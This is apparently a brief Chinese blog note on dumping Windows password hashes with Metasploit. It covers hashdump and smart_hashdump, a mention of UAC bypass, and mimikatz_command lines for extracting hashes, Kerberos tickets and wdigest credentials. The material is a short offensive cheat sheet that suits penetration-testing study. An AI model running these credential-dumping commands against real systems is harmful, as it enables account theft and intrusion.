msf之hash攻击

标签：erb   查看   comm   crypto   src   http   VID   管理权限   证书   

 使用hashdump抓取密码(需要系统管理权限)

另外一个更强大的模块 smart_hashdump

如果目标是win7 就需要先绕过UAC　

还可以使用msf内置的mimikatz抓取hash

msv

kerberos 抓取系统票据

wdigest 获取系统账户信息

mimikatz_command -f samdump::hashed 抓取hash

mimikatz_command -f handle::list 查看进程

mimikatz_command -f service::list windows 服务

mimikatz_command -f crypto::listProviders 查看系统证书 支持PowerShell调用(Invoke-Mimikatz)

msf之hash攻击

标签：erb   查看   comm   crypto   src   http   VID   管理权限   证书   

原文地址：https://www.cnblogs.com/-qing-/p/10509861.html